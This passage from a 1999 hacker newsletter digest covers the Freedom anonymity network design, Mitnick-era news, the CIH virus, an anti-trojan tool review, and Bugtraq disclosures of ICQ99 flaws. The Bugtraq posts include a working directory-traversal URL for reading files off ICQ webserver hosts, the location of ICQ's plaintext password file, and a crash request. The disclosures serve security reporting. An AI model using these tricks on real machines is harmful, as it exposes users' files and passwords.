local machine. (During the beta test, this list of neighboring AIPs is manually entered to the Freedom Server Node). A query is then sent to the Network Information Database (NIDB)
server to retrieve a list of encryption keys for the other AIPs in the cloud that may have expired prior to initialization. This query, as all communication between components in the cloud,
is performed using an Anonymous TCP (ATCP) connection.
Establishing Routes to Neighbors
Reading the list of neighbors, the AIP sends "PADDING" packets through UDP to the neighbors. These packets have the same size as payload packets to provide "for free" cover traffic.
The use of PADDING packets and cover traffic introduces the notion of a Heartbeat amongst the AIPs. A heartbeat is defined as the time delay at which a packet must leave the machine
for a specific neighbor, hiding any information of the AIP server's status (idle or busy). The heartbeat concept prevents traffic analysis to a significant degree. Since packets are sent out
on a regular basis, and knowing the rate at which these heartbeat packets arrive at a machine, an AIP can determine if a neighbor is unreachable since it will fail to send an ALIVE packet
after a certain amount of time. PADDING packets further prevent traffic analysis by maintaining a constant data flow between the AIPs. In addition, all data is link encrypted between two
adjacent routers with a shared session key.
Payload Route Creation
The originator of a connection chooses a route to follow through the anonymous cloud. The route consists of a user-definable number of AIP jumps within a system-wide minimum and
maximum of jumps. By imposing a minimum number of jumps, the anonymity of the transaction is guaranteed. The maximum number of jumps is imposed to establish a maximum packet
size. The default number of jumps is three
The route is created with information that includes Anonymous Connection IDs (ACIs), the next AIP hop for the current route, client/AIP symmetric keys, cryptographic algorithms, and
expiry time of the route.
The originator of an anonymous connection has an initial cache of routes to travel through the cloud. This cache is validated and an initial Anonymous TCP (ATCP) connection is made
with an AIP. This selection is a general case of route selection (using a limited subset of AIPs). Next, the client requests a set of routes and signing keys from the AIP it is connected to.
The AIP then sends the routes and signing keys to the client. Once verified, the local routing table is updated. This ensures that as little correlation as possible can be made between the
request for the initial set of routes and the creation of a digital identity (and corresponding route). Requesting these routes from a single source would enable easy monitoring of such
requests. Using the cloud as the source of routes hides this action from observers.
Once the client receives a topological map and a link state table, it can proceed to compute a path from an input to an exit AIP.
Users may choose to activate Freedom's Automatic Route Selection feature, which adheres to the following specification:
For performance reasons, select an entrance AIP "close" to the client, where close is defined as being topologically close. This could potentially reveal
some information, but it is felt that the increased performance is worth the risk of exposure.
Subsequently, the following AIP is selected at random, and may include any available AIP, excluding any previously visited AIPs. This step is repeated
until the final hop is selected.
At route creation time, the first packet uses a public key algorithm to create a session key. The session key is used to encrypt all other packets sent between AIPs for that specific
Anonymous Connection ID (ACI). The payload of the anonymous packet should, at all times, be encrypted when it travels through the anonymous cloud. The only time the payload may
be "in the clear" (i.e.: the session key is decrypted) is once the data exits the anonymous cloud at a Wormhole.
To prevent traffic analysis, the lengths of the packets, are independent of the amount of data inside the packets; padding is added within each packet to ensure this. Route creation
packets are protected against traffic analysis by employing a second size PADDING packet
In order to jump from one AIP to another, the following process occurs:
1.Decrypt link encryption on the header. If the packet contains a CREATE command in the header, the decryption will occur using the AIPs private key. For all subsequent traffic, a
symmetric key is used for link decryption.
2.Process header information. The AIP responds to various header commands that include CREATE (open a path) and DESTROY (close a path). This header information is
different from the header of the packet that is being sent from the client. The header the AIP reads contains added information, such as the nature of the packet, the size of the
message packet, and the amount of padding. In the case of a packet with a CREATE header, the information decrypted from the header would include the following elements:
Forward cryptographic algorithm.
Backward cryptographic algorithm.
The IP address and port number of the next hop.
Expiry time of the route.
A selected number of bits of key seed material to get a symmetric key for the rest of the data.
1.Decrypt/encrypt the rest of the packet information. This is done using the key seed material found from within the CREATE packet header that was decrypted upon arrival at the
AIP. This is used for the forward and backward decryption keys.
2.Take the appropriate action. This includes table update and lookup actions. For example, a table lookup is performed to confirm if the ACI is currently valid; the encryption key
and algorithm are retrieved from the table and applied to the payload (encryption or decryption based on the ACI). A new header is created with the corresponding ACI. The
header is encrypted using the link encryption key and the packet is sent to the next host in the chain.
3.Create new header. A new ACI is selected and the packet is then padded to maintain the packet's size.
4.Encrypt the header with the link encryption key for the next host. The packet is encrypted using the link encryption key of the next AIP in the route.
5.Send the new packet to the next hop in the chain. The packet is released from the AIP and sent to the next one specified in the route.
6.Deliver Data to destination. When the number of jumps has met the number specified by the client, the packet is sent to the Wormhole by the final AIP in the route.
Anonymous Mail Proxy (AMP)
The Anonymous Mail Proxy (AMP) provides for both outgoing and incoming mail delivery services. It accepts email from digital identities and processes the mail by holding it for a
random amount of time and reordering all messages being held at this AMP. After the "holding" time expires, the message is sent from one AMP to another, preserving the anonymous
connection. This is done using the Anonymous Mail Transfer Protocol (AMTP).
The packet format of an AMTP packet has three parts:
Send or Reply Blocks
AMTP to SMTP headers which can change in transit
Message body
This information jumps from one AMP to another with varying levels of details and instructions, depending on which stage of the transfer is occurring.
Before any mail transfer occurs using a digital identity, a public key is created for each identity. The Freedom client then creates up to three reply blocks for each identity. The reply
blocks outline the route that mail packets will follow through the cloud (i.e.: instructions for each AMP, so they know where the packet should be sent after it has been reordered and held
in its queue). Each reply block consists of encryption keys and addresses for three selected AMPs in a specific route. The redundancy of three reply blocks is required in case one of the
AMPs (used in one of the reply blocks) is inoperable. The reply blocks are encrypted with the nymserver's public key and are sent to reside there. Future versions of Freedom will
implement more advanced methods of anonymous mail transport without the need for reply blocks.
Layered encryption is used because the user's real email address resides within the reply block of the digital identity. In a case where a digital identity receives email, the user's real
address should be kept secure until it reaches the last AMP in the return chain (which sends the message to the user's address). Although the final AMP knows the user's real email
address, it must not know the content of the message, the pseudonym under which it was originally addressed, or the origin of the message. Using layered encryption, and a lookup table
within the nymserver, confidentiality can be achieved through the reply blocks.
<img src="http://www.zeroknowledge.com/products/reply_block.gif" border=0></a>
Incoming Email
Once incoming mail arrives for a digital identity, the nymserver looks up the identity's reply block. Each dimension of the reply block consists of three articles:
The next destination in the chain (AMP or real email address)
A symmetric key
The remaining content of the layered reply block.
The nymserver decrypts the reply block with its private key, and reads the next destination AMP, a symmetric key, and the remainder of the layered reply block. The nymserver uses the
symmetric key to encrypt the mail message, then the message and the reply block are sent to the next AMP. This AMP receives the message and the reply block, decrypts its layer of the
reply block to reveal the next destination, and another symmetric key. This new symmetric key is used to encrypt the mail message, and the remainder of the reply block and the mail
message are sent to the next destination. The third AMP receives the message and the reply block. The AMP decrypts the reply block and discovers a destination and a key. The AMP
encrypts the message with the symmetric key. The destination this time, however, is not a AMP, but the user's real email address. Note that, at this point, the AMP does not know where
the original message came from, nor its content because it is multiply encrypted, and the pseudonym is no longer present because the header of the message itself is encrypted and the
reply block is entirely de-layered. The message is sent to the user at the user's email address.
Considering the conditions from the previous Web browsing example, with 3 AMPs denoted A, B, and C, and the real user real@address.ca and the pseudonym mynym@freedom.net,
we get the following:
1.Mail (denoted M) arrives to the Freedom nymserver addressed for mynym@freedom.net. The reply block for mynym (denoted BC) is found within a table. The nymserver can be
considered as being AMP-C.
2.The reply block is decrypted using the nymserver's private key.
3.AMP-C finds itself in possession of the details for the next destination (AMP-C), and a symmetric key, denoted KC. AMP-C encrypts the message with KC (i.e., EKC(M)), and
sends what remains of the reply block, being BB to AMP-B.
4.AMP-B receives the message and the block. AMP-B decrypts the block and finds the next destination details (AMP-A) and a symmetric key, denoted KB. AMP-C performs
EKB(EKC(M)) and sends the message and the remainder of the block, being BA to AMP-A.
5.AMP-A receives the message and the block. AMP-A decrypts the block and finds real@address.ca and a symmetric key, denoted KA; the block is now empty. AMP-A performs
EKA(EKB(EKC(M))) and sends the message to real@address.ca .
6.The user (real@address.ca) receives the message, and performs the necessary decryption and finds itself in possession of the original message M.
Through this process, the digital identity's integrity remains intact, the AMPs in the route are not aware of the message's content, and the mail is received.
Outgoing Email
Using Anonymous Mail Transport Protocol (AMTP), the Freedom client software deposits outgoing mail into a reordering pool at the Freedom Mail Gateway. Currently, there is only one
such pool operated by ZKS. Additional pools are expected in the future.
The digital identity's digital signature is applied to the original message at the client (prior to its multiple encryption), and its integrity is verified by the nymserver before the message is
sent.
The digital identity is not known to any of the AMPs, with the exception of the nymserver. The integrity of the pseudonym is maintained, and the confidentiality of the message headers
is maintained until the Freedom Mail Gateway. Since the digital identity's digital signature is used, the integrity of the message and the sender can be verified prior to its release, thus
ensuring against any impersonation of the digital identity.
Wormhole
The Wormhole is the interface between the anonymous network cloud and Internet hosts accessed by the end user. When a new ACI is presented to the wormhole, the wormhole
assigns a new port for it to pass TCP/UDP traffic. The wormhole, however, does not monitor the state of the TCP connection÷the AIP will notify the wormhole that a route has been
destroyed, so the wormhole can release the port-to-ACI map. The wormhole only responds to address requests for its own IP address. Any remaining relevant personal information is
stripped, and the packet goes into the real world of the Internet.
Traffic Shaper
The Traffic Shaper fulfills a dual role as both Internet bandwidth throttle and link padding envelope shaper.
Bandwidth Throttle
Most Freedom Server operators will not be able to dedicate their entire upstream connectivity bandwidth to Freedom. The Bandwidth Throttle settings determine the maximum bandwidth
that will be allocated by the Freedom Server to anonymous Internet connections.
Link Padding Envelope Shaper
Inter-AIP link padding is required to prevent traffic analysis of data passing over AICs. However, the outer bandwidth envelope does not have to continually be operated at the maximum
bandwidth allowed by the Bandwidth Throttle. As long as the outer envelope modulation is kept independent of the data flowing through the link, information leakage will not occur. To
minimize bandwidth costs, the Link Padding Envelope Shaper modulates the outer link envelope as determined by a formula that takes into account historical usage patterns and traffic
flows.
Freedom Client Software
The Freedom Client application runs on the user's computer and acts as a Local Anonymous Internet Proxy (LAIP). The Freedom client provides support and acts as proxy for various
Internet protocols, including
DNS
HTTP
HTTPS
SMTP
POP3
Telnet
SSH
IRC (DCC not supported)
USENET (via a web interface)
The client is, conceptually, an input funnel that anonymizes all Internet traffic before it leaves the client system to the Freedom network. Freedom avoids the trouble of managing the mail
or browsing clients, since it operates at the Winsock, session, and network levels. Freedom monitors outgoing streams and warns the user if it detects the presence of any personal
information. The user then chooses to remove the information or release the message as is.
The Freedom client also acts as a personal data manager. The release of personal data is contextual, based on the source and the active digital identity. A typical example of controlled
information release is when a user wishes to access a mandatory-registration site, but does want to reveal personal information. Using Freedom, the user creates a digital identity to
access the site; a cookie is then created using this user's pseudonymous profile. Whenever the user returns to that site, the same information is read from the cookie, granting the user
access without accidentally revealing sensitive information. The user decides what personal information is divulged and whether it is false or accurate, while the Freedom client's task is
to ensure that this process remains consistent.
Freedom Mail Gateway
The Freedom Client sends all outgoing email to the Freedom Mail Gateway using AMTP. The Freedom Mail Gateway keeps a reordering pool in which emails are kept for a random period
of time before being put into the outgoing message queue. Conversely, incoming email is stored in the reordering pool before being delivered through the AMP chains specified by the
user's reply blocks.
Freedom Network Information Database
The Freedom Network Information Database (NIDB), stores the topological maps of the Freedom network, link performance statistics, and node status information.
Freedom Keyserver
The Freedom Keyserver offers a publicly accessible database containing the public keys of each Freedom Node and of all Freedom identities. Zero Knowledge Systems does not store
and at no time has access to the corresponding private keys of the independent Freedom Server operators or Freedom users. The private keys are generated on and never leave the
individual Freedom Server or the Freedom client software.
Comparison with other proposed Internet Privacy Systems
Mixmaster
Mixmaster is an existing freeware email-only remailer.
Freedom
Mixmaster
Perfect forward secrecy.
Future compromise of the remailer key allows
attacker to decrypt all past traffic
Does not know previous mail hop. Remailer chain
can not be backtracked.
Does know previous mail hop. A legal attacker
may be able to travel up the chain, leading to the
discovery of the email's sender.
Both link and application level anonymizing.
Application level only anonymizing
Onion Routers
Onion Routers are an application proxy based TCP anonymizer proposed by the US Naval Research Laboratory.
Freedom
Onion Routers
Anonymous network payload is IP level. Any
protocol on top of IP can be supported.
Based on application level proxies. Each additional
application requires an additional proxy.
Utilizes end-to-end TCP congestion control
TCP link level encryption causes unnecessary
packet retransmission.
Traffic is encrypted before leaving the client
Traffic in the clear before reaching first node
Bibliography
Ross Anderson, "The Eternity Service", PRAGOCRYPT 96.
ftp://ftp.cl.cam.ac.uk/users/rja14/eternity.ps.Z
Andre Bacard, "Anonymous Remailer FAQ", 1996.
http://www.well.com/user/abacard/remail.html
Douglas Barnes, "The Coming Jurisdictional Swamp of Global Internetworking
(Or, How I Learned to Stop Worrying and Love Anonymity)",
unpublished manuscript, 16 Nov 1994.
http://www.communities.com/paper/swamp.html
David Chaum, "Untraceable Electronic Mail, Return addresses, and
Digital Pseudonyms", Communications of the ACM, February 1981, vol. 24 no. 2.
http://www.eskimo.com/~weidai/mix-net.txt
Lance Cotrell, "Mixmaster & Remailer Attacks", 1995.
http://www.obscura.com/~loki/remailer/remailer-essay.html
Ray Cromwell, "Welcome to the Decense Project", 1996.
http://www.clark.net/pub/rjc/decense.html
Wei Dai, "PipeNet 1.1", 1998.
http://www.eskimo.com/~weidai/pipenet.txt
Arnoud Engelfriet, "Anonymity and Privacy on the Internet", 19 Dec 1996.
http://www.stack.nl/~galactus/remailers/index.html
Ian Goldberg, David Wagner, and Eric A. Brewer,
"Privacy-enhancing technologies for the Internet",
IEEE COMPCON '97, February 1997.
http://www.cs.berkeley.edu/~daw/privacy-compcon97-www/privacy-html.html
Ian Goldberg and David Wagner,
"TAZ Servers and the Rewebber Network: Enabling Anonymous Publishing on the
World Wide Web",
Published in the First Monday electronic journal, vol 3 no 4.
http://www.firstmonday.dk/issues/issue3_4/goldberg/index.html
C. Gulcu and G. Tsudik, "Mixing E-mail with Babel",
Proc. Symp. Network and Distributed System Security, 1996, pp. 2-16.
Andreas Pfitzmann and Michael Waidner,
"Networks without user observability--design options",
EUROCRYPT 85, LNCS 219, Springer-Verlag, pp. 245-253.
Paul Syverson, David Goldschlag, Michael Reed, "Onion Routing,"
http://www.onion-router.net/Publications.html
Glossary
ACI: Anonymous Connection ID
AIP: Anonymous Internet Proxy
AMP: Anonymous Mail Proxy
AMTP: Anonymous Mail Transfer Protocol
ATCP: Anonymous TCP
LAIP: Local Anonymous Internet Proxy
NIDB: Network Information Database
Trademark Notices
Freedom and the Freedom logo are trademarks of Zero-Knowledge Systems Inc.
All other products and company names mentioned herein are the trademarks of their respective owners.
© 1998 Zero Knowledge Systems http://www.zeroknowledge.com
@HWA
08.0 Mitnick's accomplice pleads guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mitnick's hacker accomplice pleads guilty
By Dan Goodin
Staff Writer, CNET News.com
April 26, 1999, 2:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,35656,00.html
Lewis DePayne, the accomplice to notorious hacker Kevin Mitnick, today pleaded guilty to one count of wire
fraud for his role in a series of computer break-ins that took place over a three-year period, the U.S.
Attorney's office in Los Angeles said.
DePayne, 29, admitted that he took part in a plan to obtain sensitive software from cellular telephone maker
Nokia by posing as a company employee. The count was 1 of 14 brought against him in a 1996 criminal complaint.
DePayne entered his plea in federal court in Los Angeles before Judge Mariana Pfaelzer. Last month
Mitnick pleaded guilty to 5 of 25 counts in the same court.
DePayne's attorney was not immediately available for comment.
DePayne is scheduled to be sentenced July 12. Under a plea agreement, U.S. attorneys will recommend that DePayne
eceive six months' detention, five years of probation, and up to $3,000 in fines, said assistant U.S. attorney
Chris Painter. He also will have to tell investigators and the companies he is accused of defrauding exactly how
he and Mitnick were able to penetrate security systems. DePayne, who lives in Northern California, has been free
on bail, Painter said.
DePayne and Mitnick are known for their ability to hack computer systems and to "social engineer" employees
responsible for security at high-tech companies. When Mitnick was trying use cell phones to break in to computer
systems, he called Nokia posing as an employee and asked that software be sent to him. When that didn't work,
DePayne posed as the fictitious employee's supervisor. Suspecting the requests were a hoax, Nokia recorded the
call and provided investigators with tapes.
Mitnick's exploits made national headlines after his capture was reported in The New York Times and later in
the book Takedown. Mitnick, 39, is accused of breaking in to numerous computer networks, accessing thousands of
credit card numbers, and stealing software between 1992 and 1995.
U.S. attorneys fighting high-tech crime appear to be on a roll. Two weeks ago, investigators tracked down the man
they say posted a bogus Bloomberg story that caused a publicly traded company's stock to surge more than 30 points.
Last week they identified the suspect in a case in which anonymous email that threatened the lives of court
officials was posted on the Internet.
"Our offices and other offices around the country will be investigating when people cause damage to companies,
infrastructure, and proprietary data," said Painter. "These companies ought to have protection."
@HWA
09.0 Biometric Databases?
~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/news/politics/story/19338.html
http://www.wired.com/news/print_version/politics/story/19338.html?wnpg=all
DNA Databases Go Too Far
by Declan McCullagh
2:15 p.m. 26.Apr.99.PDT
WASHINGTON -- If Representative Ron Paul has his way, federal agencies will not be able to assemble biometric
profiles of Americans.
The Texas Republican wants to prohibit massive government databases of DNA samples, photographs, and retinal
scans.
"It seems like everywhere you turn there's another government attempt to accumulate more information about us.
This bill will be designed to stop those moves that use government money to set up data banks with DNA and
other identifiers, such as pictures of the retina," Paul said in an interview.
Aides to Paul, who has emerged as a prominent privacy advocate in Congress, drew up the sweeping new bill after
a public outcry arose over federal tax dollars being used to build a national database of driver-license photographs.
The US Secret Service paid Image Data LLC US$1.5 million to develop the database, which has become the target of at l
east two lawsuits since the agency's role became public.
"The fact that this was started with a grant from the Secret Service shows they're moving in that direction," Paul
said. "This whole process smells bad to me, and I thought I'd call attention to it among my colleagues by introducing
this bill."
An early draft of the proposed Privacy Protection Act would prevent the use of Secret Service funds -- or any tax
dollars, for that matter -- to create any database containing biometric information about Americans.
The federal government has recently begun to record more biometric information about Americans. Biometric technology
allows the automatic recognition of a person based on physical characteristics. The Army issues recruits at Fort Still,
Oklahoma stored value cards that require the correct fingerprint to use. The Immigration and Naturalization Service uses
voice-identification technologies at some airports.
The FBI is busy scanning paper fingerprint cards to create digital images and is feeding them into the National Crime
Information Center computer, which the government says receives more than 2 million queries a day. The NCIC database
is already overflowing with information about 32 million Americans, and Attorney General Janet Reno wants to add DNA
samples taken from anyone arrested. A preliminary version of the bill, which Paul hopes to introduce by the end of
the week, would approve databases created by the Social Security Administration, the IRS, the Census Bureau, and the
Department of Veterans Affairs. And prohibition would not apply to the "collection and use of names and Social Security
numbers by the Social Security Administration and the Internal Revenue Service for functions directly related to the
collection of revenue and the administration of the Social Security program."
Paul's staff said that the final version of the proposal would limit the expansion of existing databases.
"The creation of national databases has gone out of control over the last 10 years," said David Banisar, a lawyer at
the Electronic Privacy Information Center. They're "frequently at the instigation of Congress, which has created them
in the name of fighting immigration or welfare fraud or any number of issues. This often happens in secret, with no
public accountability or privacy protections."
Banisar added, "It's a very positive step that Congress is starting to recognize, after all this time, the dangers of
these databases."
But some experts say that the draft may go too far. "It could be too broad. I do think the federal government has a
legitimate role in dealing with interstate cooperation in terms of crime. It seems reasonable to me that the federal
government could fund an interstate crime database project...What about a hospital using federal grant funds to come
up with a database containing medical records about its patients?" asks Eugene Volokh, a law professor at the
University of California at Los Angeles.
Paul also has introduced legislation that would protect financial privacy by getting rid of the so-called Know Your
Customer plan proposed -- and since abandoned -- by banking regulators.
@HWA
10.0 In the wake of CIH...
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
CIH, Killer or Dud?
contributed by Anonymous
The media frenzy continues although at this point it is hard to tell if CIH was a major infestation or mostly
media Hype. Some reports are claiming ridiculous amounts of damage while others say there was almost
no damage.
Singapore checks in with 150 reported incidents.
Channel New Asia
http://www.channelnewsasia.com/articles/1999/4/26/news1040.htm
ZDNet
http://www.zdnet.com/zdnn/filters/bursts/0,3422,2247380,00.html
South Korea had an estimated 15% or 1 million systems
hit costing the country up to 300 billion won (US$253.86
million) in related repair costs.
A ndover News
http://www.andovernews.com/cgi-bin/news_story.pl?155551/topstories
CIH hits 12 of 60 brokerage houses in Malaysia. The infections did not hinder the performance of Malaysia's
benchmark stock index.
International Herald Tribune
http://www.iht.com/IHT/TODAY/TUE/FIN/wirus.2.html
Many government offices wiped out in Turkey. Private banks, police departments, an army school, state TRT
television, Title Deeds and Land Survey office and state-owned Kalkinma Bank where some of the places
hit.
CNN
http://customnews.cnn.com/cnews/pna.show_story?p_art_id=3663070&p_section_name=On+Target&p_art_type=1460518
Most damage relegated to Asia and Europe. Data Fellows reports damage in Hong Kong, Singapore, India,
Finland, New Zealand, Britain, Sweden, Japan, and Malta.
C|Net
http://www.news.com/News/Item/0,4,0-35632,00.html?st.ne.fd.mdh.ni
CIH hits Boston College hard, students lose a semesters worth of work. MSNBC says that while there where
pockets of infections most people where unaffected.
MSNBC
http://www.msnbc.com/news/262104.asp
Austrailia says 'No Meltdown"
Australian Broadcasting Corporation
http://www.abc.net.au/news/newslink/weekly/newsnat-27apr1999-42.htm
While no where near as widespread as Melissa, CIH was much more deadly.
Nando Times http://www.techserver.com/story/body/0,1634,42451-68484-495994-0,00.html
PC World http://www.pcworld.com/pcwtoday/article/0,1510,10717,00.html
Wired http://www.wired.com/news/news/technology/story/19334.html
CIH turned out to be no big deal with minimal damage.
Detroit Free Press http://www.freep.com/tech/qvirus27.htm
The Akron Beacon Journal http://www.ohio.com/bj/business/docs/026278.htm
10.1 CIH 1.2 Virus Hits Few
~~~~~~~~~~~~~~~~~~~~~~
Only a small number of PCs get blasted by the
"Chernobyl" virus.
by Reuters
April 27, 1999, 4:32 a.m. PT
The CIH 1.2 ("Chernobyl") virus hit computers around
the world on Monday, wiping out data on hard drives
and even causing some PCs to fail when starting up,
computer experts said.
Although the virus hit only a tiny fraction of the number
of machines affected by the recent Melissa virus, the
new bug's bite was much more deadly for an
unfortunate few.
"I've talked to people who, literally, were crying on the
telephone--a woman whose poetry book was almost
done and was completely lost, a man whose doctoral
dissertation was lost. They were devastated," said
Mikko Hermanni Hypponen, of computer security firm
Data Fellows in Helsinki.
The worst damage appeared to be taking place in Asia
and parts of Europe, where antivirus protection is less
prevalent, and with pirated software, which is often filled
with bugs.
Data Fellows reported damage in Hong Kong,
Singapore, India, Finland, New Zealand, Britain,
Sweden, Japan and Malta, with hundreds of machines
already being hit even before the United States opened
for business. The bulk of the computers affected were
in Asia, Data Fellows said.
A Handful Hit
Carnegie Mellon University's Computer Emergency Response Team said it knew of only a few dozen
computers hit by the virus. "It really hasn't been that bad," said a CERT case worker.
But the Chernobyl virus's limited impact did little to console those who were infected. DataFellows'
Hypponen said that the cost of repairs could run into the millions of dollars. "Unlike Melissa, this is causing
real problems and serious loss of data for some people," he said.
CERT said that data "may be unrecoverable" if the virus hits, and software needs to be reinstalled from the
ground up to make computers work again, a task beyond the expertise of most home computer users.
"I just turned on the doggone thing and the screen was almost totally black--it said 'os load in progress' and
then it said 'insert bootable media in appropriate drive,' said one person hit by the virus, Christina Asksomitas
of Palm Beach Country, Florida. "We tried to reboot it but nothing works."
The virus struck the campus of Boston College in Chestnut Hill, Massachusetts, shortly after midnight on
Monday, wiping out the hard drives of about 100 students, many of whom were preparing term papers,
school spokesperson Jack Dunn said.
Virus Hits Monthly
Computer experts said users could avoid the virus by not booting up their computers Monday, or resetting
the date, since the virus is activated when computer utility systems hit the twenty-sixth of each month.
While the virus has been hitting on the twenty-sixth day of each month since last year, this month's version was
expected to be the most prevalent and dangerous. The April CIH virus is c
alled the Chernobyl virus because it's
timed to go off on the anniversary of the Soviet nuclear accident, one of technology's worst disasters.
Up-to-date antivirus software will spot the virus, and many corporate computers have recently upgraded
their protection because of the Melissa scare.
Copyright © 1999 Reuters Limited
@HWA
11.0 Lockdown2000 review by BHZ
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
INTRO
We live on the edge of this millennium. Computers are become to people
what TV sets were before few decades. Main things that we want on
the Internet is privacy and security. Security is always tested
with some new bugs, flaws and vulnerabilities. So we must be always
secured. Most of the Windows95 users, are targeted by some trojans.
DEFINITION OF TROJAN
Trojans could be defined on this ways:
An unauthorized program contained within a legitimate program. This
unauthorized program performs functions unknown (and probably unwanted)
by the user.
A legitimate program that has been altered by the placement of
unauthorized code within it; this code performs functions unknown (and
probably unwanted) by the user.
Any program that appears to perform a desirable and necessary function
but that (because of unauthorized code within it that is unknown to
the user) performs functions unknown (and probably unwanted) by the
user.
LOCKDOWN2000
There are many solutions for securing yourself from trojans. From
monitoring your registry to some commercial and non commercial programs.
I think that best program I have used in trojan detection is
Lockdown2000.
The main thing in good anti-trojan cleaners is that they can be
upgradeable. The staff behind Lockdown2000 is always on alert, so
you can download newest trojan definitions from their website.
Lockdown2000 sits in your system tray and it scans your computer
in time interval that you enter. It has two modes - Scan for unknown
trojans and Background scan for trojans. Ok so this is a lifesaver
option. It monitors your registry and some system files for new
entries. When some change is made, you are being automatically alerted,
and now you can acknowledge that this string or file will be deleted
or not. It helped me when I was downloading and checking some files
from a trusted host, and in one moment something beeped and
Lockdown2000 window opened. It detected a file which tried to add
its string to the start directories in registry. I prompted that I
don't want to keep this file, and it was immediately deleted. I
later looked more into that file, and it was modified version of
Back Orifice. I deactivated Lockdown2000 and installed that trojan
(LM BO.LEENTech), and scanned my computer with some other trojan
cleaners, and it wasn't found. So trojan cleaner and registry monitor
in one program is winning combination. This current trojan signature
file has 88 trojan definitions in it. So my opinion is that this is
very impressive number.
Lockdown2000 has even more quality functions:
Port sniffer
It listens some ports on your computer, which are used to be connected
on with trojan client program.
TraceRoute
Ok so someone pinged (sent you tcp packets and waits for reply if
port is open) you on some trojan-used port. Lockdown2000 gives you
his IP address. Now with TraceRoute you can trace the "attacker",
to his Internet Service Provider, and you can report him to admins
WhoIs
Very useful because you don't have to connect Internic (or some other
domain seller - yes Internic lost monopoly on it), because you can
do it from program who is always close to you - in your system tray.
File Sharing
File and Print sharing was very popular intrusion method some months
ago when it was reported by Rhino9, and Legion software (scans for
"open" computers) was produced. If you have some disk partitions
which must be opened to just a group of people, you just use
Lockdown2000 and put a password on the share.
LOCKDOWN2000 INFO
Program name: Lockdown2000 v.2.5.4
Website : http://www.lockdown2000.com
Tech support : support@lockdown2000.com
BHZ
bhz@net-security.org
http://net-security.org
@HWA
12.0 ICQ99 Vulnerabilities and Exploits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 25 Apr 1999 22:46:02 +0400
From: delta <x-delta@USA.NET>
To: BUGTRAQ@netspace.org
Subject: ICQ 99 Password
Hi! I find that icq 99 stored password in open text in file
ICQ\NewDB\uin#.dat
try open it with note pad , hit search and enter your password .
Password always placed in the end of line "iUserSound"
Thanx!
----------------------------------------------------------------------------
Date: Mon, 5 Apr 1999 23:50:56 +0200
From: Jan Vogelgesang <wj.Vogelgesang@SAARBRUECKEN.NETSURF.DE>
To: BUGTRAQ@netspace.org
Subject: security hole in ICQ-Webserver
Hi,
Some days ago i've read a message here in Bugtraq from Ronald A. Jarell
about a vulnerability in the ICQ-Webserver . I tried to reproduce this
vulnerability with my computer (win95) and find out the following:
-sending any non-http stuff or even a simple "get" (without any other
characters however) crashes the ICQ-Client. This works with ICQ99a V2.13
Build 1700, but not with Build 1547.
Moreover, there is a much bigger hole in the ICQ-Webserver: If you have
the webserver enabled, everyone can access your complete(!) harddisk
with a simple webbrowser. When your page is activated and you are online,
each request to "http://members.icq.com/<your ICQ-Number>" will be
redirected to your computer. Thus, every visitor get to know your current ip.
Nevertheless, only the files in "/ICQ99/Hompage/<your ICQ-Number>/personal"
should be accessible. But a visitor can "climb up" the directory tree with
some dots, e.g. "http://<yourIP>/...../a2.html" would present him the file
"a2.html" in the "ICQ99" directory. With some more dots, he would come to
the root-directory of your harddisk. But there is one barrier: The
ICQ-Webserver only delivers files with a ".html" extension. After some
experiments I found a way to trick it out: I add ".html/" to the URL and
the Webserver sends every file I request. For instance,
"http://<yourIP>/............./config.sys" won't work, but
"http://<yourIP>/.html/............./config.sys" would.
I have test this both with Build 1700 and with Build 1547.
In my opinion, this is a significant security problem, because password
files or even the registry in the windows directory can be read.
I warned Mirabilis about it and hope they will informe the ICQ-community.
sorry for my poor english...
Jan Vogelgesang
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 08:45:48 -0400
From: "[iso-8859-1] José Reyes Cedeño" <jreyes@CEIS.ISPJAE.EDU.CU>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
>Well, my box was win 98, and the remote box I tested it against was
>win 95. Didn't have anyone running NT handy to test against. However,
>another person I corresponded with who was testing this did get it to
>drop a 95 box, but not every time. Did it every time for me; but there's
>apparently other factors that contribute as well.
>
>--
>Ron Jarrell
>VA Tech Computing Center
I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I
could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build
1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained
the procedure that they carried out to arrive to the error detailedly.
Best regards, Jose.
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 19:35:35 +0000
From: sven@MSC-MEDIA.COM
To: BUGTRAQ@netspace.org
Subject: Re: security hole (READ AS: security chasm) in ICQ-Webserver
On 8 Apr, DaChronic wrote:
> I can confirm this with Win9x but not with WinNT 4.0 sp3 and hotfixes
> nor sp4 (can anyone else?). ..........
As it was discussed some time ago in this list
the 'more than 2 dot' feature is not working with NT.
But it is definitely working with 95/98.
Maybe replacing /.../ with /../../ will work ?
CU Sven
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 18:08:06 -0700
From: Scott <smc@visuallink.com>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
I'm using Win98/4.10.1998 w/ ICQ Version 99a Beta v.2.13 Build #1700
I could crash my ICQ webserver and read files remotely. When I have tried
this on other computers, it only works some of the time, sometimes it
returns "Forbidden" when I try to crash it or d/l files
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 19:30:18 -0400
From: Kaven Rousseau <rousseau@GLOBETROTTER.QC.CA>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
At 08:45 1999-04-08 -0400, you wrote:
>>Well, my box was win 98, and the remote box I tested it against was
>>win 95. Didn't have anyone running NT handy to test against. However,
>>another person I corresponded with who was testing this did get it to
>>drop a 95 box, but not every time. Did it every time for me; but there's
>>apparently other factors that contribute as well.
>>
>>--
>>Ron Jarrell
>>VA Tech Computing Center
>
>I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I
